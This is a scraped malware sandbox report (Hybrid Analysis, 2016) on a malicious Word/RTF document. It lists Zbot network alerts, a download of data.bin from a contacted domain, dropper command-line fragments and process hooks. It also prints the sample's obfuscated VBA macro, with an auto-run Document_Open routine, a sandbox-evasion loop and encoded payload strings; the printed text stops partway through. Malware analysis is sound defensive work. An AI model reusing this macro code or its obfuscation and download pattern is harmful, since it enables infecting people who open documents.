Tortor PC.contractq01rh.17o-o34u53j.rtf
This report is generated from a file or URL submitted to this webservice on August 8th 2016 15:49:02 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin" (SID: 2018052, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 2/53 Antivirus vendors marked sample as malicious (3% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pataplouf.com
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Found indicators of dropper code in the commandline
- details
-
Found "... =16" "WLa3.SEnd()" "Of0e3 ..." on invoke of cmd.exe (Show Process)
Found "... ZxmzF WLa3.RESpONsEBOdY" "PQrK=83 ..." on invoke of cmd.exe (Show Process)
Found "... " "FPiAJMz.SaveToFIlE MgWH & C5 ..." on invoke of cmd.exe (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Shows malicious Office specific indicators
- details
- The file contains VBA macros and spawned processes in a way typical for malicious Office files
- source
- Indicator Combinations
- relevance
- 10/10
-
Found indicators of dropper code in the commandline
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "213.186.33.168" (ASN: 16276, Owner: OVH SAS): ...
URL: http://macanders.fr/ (AV positives: 1/68 scanned on 08/08/2016 05:22:24)
URL: http://levincennes.be/ (AV positives: 1/68 scanned on 08/07/2016 17:35:43)
URL: http://www.drone-alsace.fr/ (AV positives: 1/68 scanned on 08/07/2016 08:39:55)
URL: http://www.brdistribucion.com/ (AV positives: 2/68 scanned on 08/05/2016 20:48:39)
URL: http://ecoleprincessedeliege.be/ (AV positives: 1/68 scanned on 08/05/2016 19:51:06)
File SHA256: 0c8b939254627f5ad28de26ac2b143cdc7de49467f8097570050c48934d5a44b (AV positives: 1/53 scanned on 07/18/2016 10:37:19)
File SHA256: 5af506d60609a2e98a50707e32aee78b9b20402e603b3f55d03c3f8bccb63492 (AV positives: 1/55 scanned on 04/13/2016 05:58:38)
File SHA256: ba9ffd1fbb0a03dab0955439b4b25ae29c50d42e08b4bbb5408e07e22d43c2b8 (AV positives: 3/57 scanned on 04/11/2016 00:01:26)
File SHA256: 91a08334c89365e1c9c90cb0f5a8881e67141b21ac1683232ffcb125e3a970b7 (AV positives: 28/54 scanned on 01/31/2016 05:12:38)
File SHA256: f92bc21a965048a3087a81a282993f3d3e11fb8ca4ca84a26655529f2e3043f2 (AV positives: 33/55 scanned on 01/24/2016 17:58:11) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Document contacts a domain
- details
- This kind of behavior is often seen on document exploits or macros utilized as a dropper
- source
- Indicator Combinations
- relevance
- 3/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Suspicious Indicators 10
-
Installation/Persistance
-
Drops executable files
- details
- "000.RTV" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{970CBB03-0673-49D2-8698-D021578856D1}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{186E8465-14E4-4EBF-8240-D549FE14F488}.tmp" - source
- API Call
- relevance
- 7/10
-
Drops executable files
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "45dfb70f" to virtual address "0x65A20BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e96033e6ed" to virtual address "0x779A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0bad0bb4d0568dcf5256bc3" to virtual address "0x054B4264"
"WINWORD.EXE" wrote bytes "b800000000663d33c0babc2b4c0068dcf5256bc3" to virtual address "0x054B4224"
"WINWORD.EXE" wrote bytes "e92399e8ed" to virtual address "0x779A5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba3c2d4c0068dcf5256bc3" to virtual address "0x054B42E4"
"WINWORD.EXE" wrote bytes "023de5fd" to virtual address "0x2FF81B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "e99a54e5ed" to virtual address "0x779A3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "2207996a" to virtual address "0x66A278E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0babc2c4c0068dcf5256bc3" to virtual address "0x054B42A4"
"WINWORD.EXE" wrote bytes "ef6f8bff" to virtual address "0x6AD62A00" (part of module "CSS7DATA0009.DLL")
"WINWORD.EXE" wrote bytes "226dec23" to virtual address "0x6B7910AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0bafc2a4c0068dcf5256bc3" to virtual address "0x054B41C4"
"WINWORD.EXE" wrote bytes "ff83c414" to virtual address "0x6B481F20" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "e04b976a" to virtual address "0x6BFBCA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0bafc2b4c0068dcf5256bc3" to virtual address "0x054B4244"
"WINWORD.EXE" wrote bytes "c4ca287780bb287752ba28779fbb287708bb287746ce287761382977de2f2977d0d92877000000001779ed754f91ed757f6fed75f4f7ed7511f7ed75f283ed75857eed7500000000" to virtual address "0x6F4B1000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba7c2b4c0068dcf5256bc3" to virtual address "0x054B4204"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bafc2c4c0068dcf5256bc3" to virtual address "0x054B42C4"
"WINWORD.EXE" wrote bytes "02597510" to virtual address "0x6FB13408" (part of module "MSCSS7EN.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 3 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 11
-
General
-
Contacts domains
- details
- "pataplouf.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "213.186.33.168:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Dim EFJ() As Integer
Dim UHxM(13112 - 4112) As Long, B1D(19879 - 9880) As Long
Private Function IKJ(ByVal KQwUl As Variant) As Long
Omecz = 45
Select Case Omecz
Case 95
Omecz = Omecz + 1
Case 46
Omecz = Omecz + Omecz
Case Else
Omecz = Omecz - 1
End Select
On Error GoTo KA
G7izc = 72
Select Case G7izc
Case 61
G7izc = G7izc + 1
Case 96
G7izc = G7izc + G7izc
Case Else
G7izc = G7izc - 1
End Select
Dim XNfD As Long, XTXs As Variant
ApU = 61
Select Case ApU
Case 9
ApU = ApU + 1
Case 20
ApU = ApU + ApU
Case Else
ApU = ApU - 1
End Select
Do
XTXs = KQwUl(XNfD)
XNfD = XNfD + 1
Loop
FtOlE = 72
Select Case FtOlE
Case 1
FtOlE = FtOlE + 1
Case 42
FtOlE = FtOlE + FtOlE
Case Else
FtOlE = FtOlE - 1
End Select
KA:
GJg = 64
Select Case GJg
Case 27
GJg = GJg + 1
Case 39
GJg = GJg + GJg
Case Else
GJg = GJg - 1
End Select
If XNfD = 0 Then Exit Function
QCC = 72
Select Case QCC
Case 86
QCC = QCC + 1
Case 45
QCC = QCC + QCC
Case Else
QCC = QCC - 1
End Select
IKJ = XNfD - 1
JzdMN = 27
Select Case JzdMN
Case 75
JzdMN = JzdMN + 1
Case 5
JzdMN = JzdMN + JzdMN
Case Else
JzdMN = JzdMN - 1
End Select
End Function
Private Function Ytj(ByVal FpOmG6 As String, ByVal Im As Long, ByVal Xb As Variant) As String
FvU = 61
Select Case FvU
Case 1
FvU = FvU + 1
Case 55
FvU = FvU + FvU
Case Else
FvU = FvU - 1
End Select
Dim Sm8() As Byte, AB0() As Byte, O0O2LcO As Long, BZ As Long
IJQ = 97
Select Case IJQ
Case 24
IJQ = IJQ + 1
Case 44
IJQ = IJQ + IJQ
Case Else
IJQ = IJQ - 1
End Select
Sm8 = FpOmG6
LSlGnZp = 91
Select Case LSlGnZp
Case 43
LSlGnZp = LSlGnZp + 1
Case 86
LSlGnZp = LSlGnZp + LSlGnZp
Case Else
LSlGnZp = LSlGnZp - 1
End Select
O0O2LcO = IKJ(Sm8)
E3FoiM = 98
Select Case E3FoiM
Case 49
E3FoiM = E3FoiM + 1
Case 70
E3FoiM = E3FoiM + E3FoiM
Case Else
E3FoiM = E3FoiM - 1
End Select
Im = (Im - 1) * 2
J5EI1k = 67
Select Case J5EI1k
Case 81
J5EI1k = J5EI1k + 1
Case 84
J5EI1k = J5EI1k + J5EI1k
Case Else
J5EI1k = J5EI1k - 1
End Select
Xb = (Xb * 2) - 1
Yyj = 43
Select Case Yyj
Case 30
Yyj = Yyj + 1
Case 92
Yyj = Yyj + Yyj
Case Else
Yyj = Yyj - 1
End Select
If Im + Xb > O0O2LcO Then Xb = O0O2LcO - Im
Av0NQ = 85
Select Case Av0NQ
Case 57
Av0NQ = Av0NQ + 1
Case 82
Av0NQ = Av0NQ + Av0NQ
Case Else
Av0NQ = Av0NQ - 1
End Select
ReDim AB0(Xb)
QkOhm = 90
Select Case QkOhm
Case 95
QkOhm = QkOhm + 1
Case 35
QkOhm = QkOhm + QkOhm
Case Else
QkOhm = QkOhm - 1
End Select
For BZ = Im To Im + Xb
AB0(BZ - Im) = Sm8(BZ)
Next BZ
Id1 = 37
Select Case Id1
Case 83
Id1 = Id1 + 1
Case 18
Id1 = Id1 + Id1
Case Else
Id1 = Id1 - 1
End Select
Ytj = AB0
BV = 50
Select Case BV
Case 92
BV = BV + 1
Case 17
BV = BV + BV
Case Else
BV = BV - 1
End Select
End Function
Private Function NUKOe(Kcua, TzNOo)
NUKOe = Kcua - (TzNOo * (Kcua \ TzNOo))
End Function
Private Function V9rjJ(QYn As Long, WTRXBf As Long) As Byte
Mn2tjQ = 29
Select Case Mn2tjQ
Case 93
Mn2tjQ = Mn2tjQ + 1
Case 27
Mn2tjQ = Mn2tjQ + Mn2tjQ
Case Else
Mn2tjQ = Mn2tjQ - 1
End Select
Dim QoWvn As Long, T4OMnqL As Long
Nuk = 61
Select Case Nuk
Case 50
Nuk = Nuk + 1
Case 84
Nuk = Nuk + Nuk
Case Else
Nuk = Nuk - 1
End Select
For QoWvn = (468000 / 9750) To (3012 - 2955)
If Ytj(QYn, WTRXBf, 1) = T4OMnqL Then V9rjJ = QoWvn: Exit For
T4OMnqL = T4OMnqL + 1
Next QoWvn
TCYLnc = 44
Select Case TCYLnc
Case 76
TCYLnc = TCYLnc + 1
Case 78
TCYLnc = TCYLnc + TCYLnc
Case Else
TCYLnc = TCYLnc - 1
End Select
End Function
Private Function RPSDiS(YLRF, PIy043)
YQ74m = 5
Select Case YQ74m
Case 6
YQ74m = YQ74m + 1
Case 3
YQ74m = YQ74m + YQ74m
Case Else
YQ74m = YQ74m - 1
End Select
RPSDiS = (YLRF And Not PIy043) Or (Not YLRF And PIy043)
RU = 73
Select Case RU
Case 98
RU = RU + 1
Case 97
RU = RU + RU
Case Else
RU = RU - 1
End Select
End Function
Private Function W55F(ByVal LEkYl9 As Integer) As String
KzPA = 77
Select Case KzPA
Case 33
KzPA = KzPA + 1
Case 92
KzPA = KzPA + KzPA
Case Else
KzPA = KzPA - 1
End Select
Dim RJLm6f(1) As Byte, GCqPE As Byte, Y3cUd As Byte
P6G = 34
Select Case P6G
Case 77
P6G = P6G + 1
Case 1
P6G = P6G + P6G
Case Else
P6G = P6G - 1
End Select
If LEkYl9 < 0 Then Exit Function
BxoG = 39
Select Case BxoG
Case 61
BxoG = BxoG + 1
Case 49
BxoG = BxoG + BxoG
Case Else
BxoG = BxoG - 1
End Select
If LEkYl9 > (2095590 / 8218) Then
Gznk = 96
Select Case Gznk
Case 29
Gznk = Gznk + 1
Case 57
Gznk = Gznk + Gznk
Case Else
Gznk = Gznk - 1
End Select
Y3cUd = 0
Else
UlequE = 90
Select Case UlequE
Case 21
UlequE = UlequE + 1
Case 83
UlequE = UlequE + UlequE
Case Else
UlequE = UlequE - 1
End Select
GCqPE = LEkYl9
K87e6NW = 89
Select Case K87e6NW
Case 76
K87e6NW = K87e6NW + 1
Case 89
K87e6NW = K87e6NW + K87e6NW
Case Else
K87e6NW = K87e6NW - 1
End Select
Y3cUd = 0
DrY = 32
Select Case DrY
Case 61
DrY = DrY + 1
Case 47
DrY = DrY + DrY
Case Else
DrY = DrY - 1
End Select
End If
XTDfFuA = 8
Select Case XTDfFuA
Case 7
XTDfFuA = XTDfFuA + 1
Case 82
XTDfFuA = XTDfFuA + XTDfFuA
Case Else
XTDfFuA = XTDfFuA - 1
End Select
RJLm6f(0) = GCqPE
Czd0uPj = 34
Select Case Czd0uPj
Case 42
Czd0uPj = Czd0uPj + 1
Case 91
Czd0uPj = Czd0uPj + Czd0uPj
Case Else
Czd0uPj = Czd0uPj - 1
End Select
RJLm6f(1) = Y3cUd
AxLZ = 31
Select Case AxLZ
Case 24
AxLZ = AxLZ + 1
Case 46
AxLZ = AxLZ + AxLZ
Case Else
AxLZ = AxLZ - 1
End Select
W55F = RJLm6f
Uk = 74
Select Case Uk
Case 20
Uk = Uk + 1
Case 10
Uk = Uk + Uk
Case Else
Uk = Uk - 1
End Select
End Function
Private Sub DOCument_OpEn()
Gtv = 74
Select Case Gtv
Case 6
Gtv = Gtv + 1
Case 13
Gtv = Gtv + Gtv
Case Else
Gtv = Gtv - 1
End Select
On Error Resume Next
WiPnr = 49
Select Case WiPnr
Case 34
WiPnr = WiPnr + 1
Case 81
WiPnr = WiPnr + WiPnr
Case Else
WiPnr = WiPnr - 1
End Select
Dim CVxSk5P As Long, R6r79L As Long, ANn As Long
FtU3 = 90
Select Case FtU3
Case 57
FtU3 = FtU3 + 1
Case 83
FtU3 = FtU3 + FtU3
Case Else
FtU3 = FtU3 - 1
End Select
CVxSk5P = 91370
WjA9KZx = 43
Select Case WjA9KZx
Case 66
WjA9KZx = WjA9KZx + 1
Case 43
WjA9KZx = WjA9KZx + WjA9KZx
Case Else
WjA9KZx = WjA9KZx - 1
End Select
For R6r79L = 1 To CVxSk5P
ANn = ANn + 1
Next R6r79L
Nf = 53
Select Case Nf
Case 81
Nf = Nf + 1
Case 23
Nf = Nf + Nf
Case Else
Nf = Nf - 1
End Select
If ANn = CVxSk5P Then
B1tv75A = 8
Select Case B1tv75A
Case 83
B1tv75A = B1tv75A + 1
Case 2
B1tv75A = B1tv75A + B1tv75A
Case Else
B1tv75A = B1tv75A - 1
End Select
Dim JKGA As Integer, JnimVG1 As String
For JKGA = 5 To 398
JnimVG1 = JnimVG1 + JKGA
Next
NaB16k = 89
Select Case NaB16k
Case 86
NaB16k = NaB16k + 1
Case 95
NaB16k = NaB16k + NaB16k
Case Else
NaB16k = NaB16k - 1
End Select
MwlL5KT
Else
AzpLwA7 = 49
Select Case AzpLwA7
Case 19
AzpLwA7 = AzpLwA7 + 1
Case 11
AzpLwA7 = AzpLwA7 + AzpLwA7
Case Else
AzpLwA7 = AzpLwA7 - 1
End Select
NIg
Pfk = 78
Select Case Pfk
Case 32
Pfk = Pfk + 1
Case 96
Pfk = Pfk + Pfk
Case Else
Pfk = Pfk - 1
End Select
End If
GZ = 68
Select Case GZ
Case 88
GZ = GZ + 1
Case 92
GZ = GZ + GZ
Case Else
GZ = GZ - 1
End Select
End Sub
Private Function FXZ1Aht(DnXRUV As Integer) As Byte()
FLtCr = 75
Select Case FLtCr
Case 78
FLtCr = FLtCr + 1
Case 96
FLtCr = FLtCr + FLtCr
Case Else
FLtCr = FLtCr - 1
End Select
Dim Tf14c(1) As Byte, LWn90 As Long, CP5oVH0 As Byte
SC = 25
Select Case SC
Case 5
SC = SC + 1
Case 65
SC = SC + SC
Case Else
SC = SC - 1
End Select
For LWn90 = 0 To 1
Tf14c(LWn90) = (Int(DnXRUV / (2 ^ ((7260 - 7252) * (1 - LWn90))))) And (-202 + 457)
Next LWn90
KzR3Cw = 19
Select Case KzR3Cw
Case 88
KzR3Cw = KzR3Cw + 1
Case 53
KzR3Cw = KzR3Cw + KzR3Cw
Case Else
KzR3Cw = KzR3Cw - 1
End Select
ReDim FXZ1Aht(1) As Byte
JXE = 33
Select Case JXE
Case 32
JXE = JXE + 1
Case 8
JXE = JXE + JXE
Case Else
JXE = JXE - 1
End Select
For LWn90 = 0 To 1 \ 2
CP5oVH0 = Tf14c(LWn90)
Tf14c(LWn90) = Tf14c(1 - LWn90)
Tf14c(1 - LWn90) = CP5oVH0
Next
U6BDRF = 60
Select Case U6BDRF
Case 24
U6BDRF = U6BDRF + 1
Case 57
U6BDRF = U6BDRF + U6BDRF
Case Else
U6BDRF = U6BDRF - 1
End Select
FXZ1Aht = Tf14c
TarqAL = 44
Select Case TarqAL
Case 38
TarqAL = TarqAL + 1
Case 81
TarqAL = TarqAL + TarqAL
Case Else
TarqAL = TarqAL - 1
End Select
End Function
Private Sub MwlL5KT()
Sym = 34
Select Case Sym
Case 52
Sym = Sym + 1
Case 97
Sym = Sym + Sym
Case Else
Sym = Sym - 1
End Select
Dim W5l As String
Ooh = 37
Select Case Ooh
Case 82
Ooh = Ooh + 1
Case 46
Ooh = Ooh + Ooh
Case Else
Ooh = Ooh - 1
End Select
NQFe = 1
Select Case NQFe
Case 39
NQFe = NQFe + 1
Case 76
NQFe = NQFe + NQFe
Case Else
NQFe = NQFe - 1
End Select
W5l = "-27043&14415&8326&15111&-7018&1054&-2649&15607&30892&-7385&-28986&-25402&-13300&-12964&2799&13518&-32530&-8179&2239&7087&-12293&13952&-25382&11135&-12149&-20524&8421&19043&9135&-22108&-28164&-15234&-19013&-15539&-20081&32565&-26104&-22857&7564&-29154&7398&-22417&-9467&-31325&-1879&29799&22649&11974&-21962&-22704&31095&26488&-23004&-10798&31566&16779&17515&-7116&-25361&-14170&-10816&6439&6161&-1641&-7119&32543&29357&-7324&26629&28884&-19816&25372&-29400&-28198&-30899&-13395&-29674&-31318&21966&-2729&-23105&26843&-7247&13532&28640&10632&29341&24525&-25486&-3732&-27377&25582&-30879&18830&16596&13614&-21651&21361&-27277&-14915&-17589&-27448&-5774&14180&16121&-10335&-26203&11367&16902&26910&-24521&519&-14946&21474&-13625&13282&-24776&-10688&6478&-9377&-30345&7453&-906&-11277&12591&23228&"
K7Iu = 90
Select Case K7Iu
Case 8
K7Iu = K7Iu + 1
Case 9
K7Iu = K7Iu + K7Iu
Case Else
K7Iu = K7Iu - 1
End Select
W5l = W5l & "-20442&15687&-8504&28639&-24839&15295&2633&-11428&-16744&26423&29273&-1078&8041&-2574&-20736&19565&-14934&18374&-20238&-27297&23518&32192&2041&19798&30659&2436&8891&14702&-21543&9040&12865&-25666&-22377&9546&-12195&-4720&-18253&28103&-20480&-24665&2137&-6838&24923&6516&14294&3984&-28374&1778&-11100&-19981&-26007&-2583&1080&-2657&-31791&27113&-6819&-4534&-28250&20334&27674&-18217&-7510&-23998&1181&9068&-27371&-25127&12175&11457&31946&-14397&-18811&25103&30387&14356&8291&-21184&-19140&-28722&18198&-19644&-18603&-15746&5782&31495&31195&2713&-30601&-24333&-11155&28348&-17400&4818&-13434&-12881&9640&9040&-7596&20256&-18659&7563&22654&-6530&15626&-678&18599&-7402&2238&15487&-27817&-4600&-11320&7120&-22250&22680&-28292&-7654&17753&31923&13388&32028&6186&27787&-26860&31558&27305&28963&-630&"
Ch6Z9d = 4
Select Case Ch6Z9d
Case 43
Ch6Z9d = Ch6Z9d + 1
Case 25
Ch6Z9d = Ch6Z9d + Ch6Z9d
Case Else
Ch6Z9d = Ch6Z9d - 1
End Select
W5l = W5l & "20587&590&-18464&-26363&-30223&-4953&-32412&28180&-21407&-10577&-7242&11731&22392&-1899&-28556&-12419&24278&5932&-10159&-1495&-10378&-28882&-16017&-17664&17970&-3218&-14005&-9362&19986&-12123&9926&21412&-24890&-18014&-27258&-12119&-29091&-4082&-14016&24677&-21614&-2592&10516&-21486&28461&-22874&27129&5821&-9922&20742&30893&-14870&-29666&31358&-3246&25926&-22204&-20006&-19600&-29859&-29783&-4864&13761&25619&-14964&-19640&3416&29349&-22682&21106&-15038&8234&-25886&-28143&-7824&-3459&-23803&14044&6752&652&4100&-31498&-7968&5055&-28065&-2334&10529&17597&-11540&5001&-15381&-6260&10448&14712&21453&-6287&-15938&27460&-17260&-26869&24618&-18081&-14360&-17099&1460&-4294&16365&-1783&13556&29397&2634&-12168&8152&20496&-32728&5093&15443&-5090&15004&31359&-29035&-14152&-26724&19481&-3781&-11514&"
KM8PlK = 95
Select Case KM8PlK
Case 4
KM8PlK = KM8PlK + 1
Case 54
KM8PlK = KM8PlK + KM8PlK
Case Else
KM8PlK = KM8PlK - 1
End Select
W5l = W5l & "7706&10031&19303&9992&17837&-23820&2508&-1415&12467&-26018&-11843&7438&4721&-2072&11580&-29222&-15317&3134&-2625&-8575&-14453&-28744&20722&-30005&25414&-5070&22702&-30936&27730&-2530&-21598&-7569&26695&-7925&23778&-15598&21794&28867&-25417&-11361&4427&6044&2255&-4174&23989&4136&22993&8337&-27291&18501&-25916&2511&-8858&-26036&16931&12341&-28732&-23505&7575&-18812&1850&-23827&-3444&-23470&-15684&-21673&19390&14112&-22327&2011&-7470&-5238&-3657&29926&-28611&-18710&24276&-29695&18484&-20651&8611&21928&12527&13145&24936&-14552&-11106&5665&-27264&-22197&-25608&27413&20566&-31899&30425&13908&26148&7921&19222&-28754&6643&-30232&32107&15211&15255&32174&-2462&14407&8505&25230&13657&11802&-18856&2213&24222&-16735&-5373&27441&10280&-28907&-1036&-7302&27576&-28659&20025&-27236&29292&21456&16278"
SKJtj = 57
Select Case SKJtj
Case 46
SKJtj = SKJtj + 1
Case 81
SKJtj = SKJtj + SKJtj
Case Else
SKJtj = SKJtj - 1
End Select
W5l = W5l & "&32762&-1745&-18080&12201&-12489&-6584&30573&-25954&-25559&12921&19919&-26844&-25019&-4190&6990&-5192&-20465&-15997&-16457&-30569&-28099&-11908&-5500&-18842&23928&20528&-3477&-1531&-24221&-12266&10387&-19342&-14651&-6092&-3925&9573&-848&4631&-25098&-636&-8382&-8930&31898&32291&31889&19916&27280&28605&30738&-22920&25696&-30191&-19656&20388&-5661&15587&-27070&-5229&21235&-31517&22226&-19529&7859&-32605&11896&15020&-32153&-29485&6391&-19165&22165&27848&-12100&553&-21594&-26588&17236&-5687&14361&-6640&6564&-30945&28480&23210&-14748&-26986&-11362&-11625&4882&24456&-11115&28402&-18871&711&3688&-28190&19886&-9526&6435&20959&-246&4458&-10522&19666&13127&24152&1214&-25703&-32028&21190&-30177&2191&9272&-24677&-31087&7141&-13789&7473&5896&-1980&13528&13426&-7326&-210&11367&26812&31414&774&5730"
Yucd = 72
Select Case Yucd
Case 1
Yucd = Yucd + 1
Case 16
Yucd = Yucd + Yucd
Case Else
Yucd = Yucd - 1
End Select
W5l = W5l & "&-4716&-6981&543&-10964&24333&8440&15412&17247&21442&-15323&-19491&-19332&11830&-26062&18117&-6790&-23711&18187&24021&-23815&-30732&6765&-13549&-22068&632&24018&22275&9584&25285&-11087&505&-24551&8584&26923&14346&-12365&-7297&26116&22086&-25147&-26060&1400&9959&22918&-17205&-24782&12356&-18319&-772&7682&-25674&-31144&-4081&19001&19214&2125&12347&-22592&-18822&24570&9032&11114&-4047&25145&17893&-10633&4515&-4302&18045&-25613&-25922&28713&23575&1791&-280&1703&12296&-2070&2016&-18973&-29030&-30842&-5261&11711&-20004&30329&9963&29280&3275&21795&26044&25093&-6409&-25422&-18729&22789&-1105&9834&-7556&29699&15331&-23049&12595&-30249&-19260&-26688&4282&27396&8937&-12255&-9669&-6703&27155&2825&17612&-29720&7982&21368&-32394&16869&1359&23968&-6568&24892&-31902&30473&-24381&-25576&25362&-29417"
Kje1h = 24
Select Case Kje1h
Case 85
Kje1h = Kje1h + 1
Case 76
Kje1h = Kje1h + Kje1h
Case Else
Kje1h = Kje1h - 1
End Select
W5l = W5l & "&5863&31106&-30707&7623&15376&-17175&14076&3568&3455&-27325&28670&2256&11059&-26755&8537&7787&-15718&11903&16457&12624&29477&-16443&6303&21663&-2085&-13403&5795&-24475&-25332&17950&18401&5273&20630&-14470&-6995&-31903&-363&26920&23437&21901&16459&-28712&22972&-13867&-6811&9089&3813&-21512&-20017&9583&13838&27224&32247&3985&-7275&801&25398&4213&-20345&5698&-3976&-13985&1298&-20327&-32259&-28866&-32509&-15355&16850&14322&-19140&-4766&-24626&-13801&28270&-18432&-21224&25283&3283&-12576&15403&-15803&21546&7933&30551&8491&-6964&13422&-23716&-31666&18716&-26733&-27168&24977&3911&4682&-941&-13516&-4117&-24179&12844&29390&-16913&4781&-17457&-27826&-28276&-31250&-3337&-1889&-13889&32053&-22890&14943&-4116&-3985&18066&25695&-8380&9473&17717&8325&25674&-15992&-3163&29212&-10760&-12598&-22357&-"
RMe8jEf = 44
Select Case RMe8jEf
Case 73
RMe8jEf = RMe8jEf + 1
Case 59
RMe8jEf = RMe8jEf + RMe8jEf
Case Else
RMe8jEf = RMe8jEf - 1
End Select
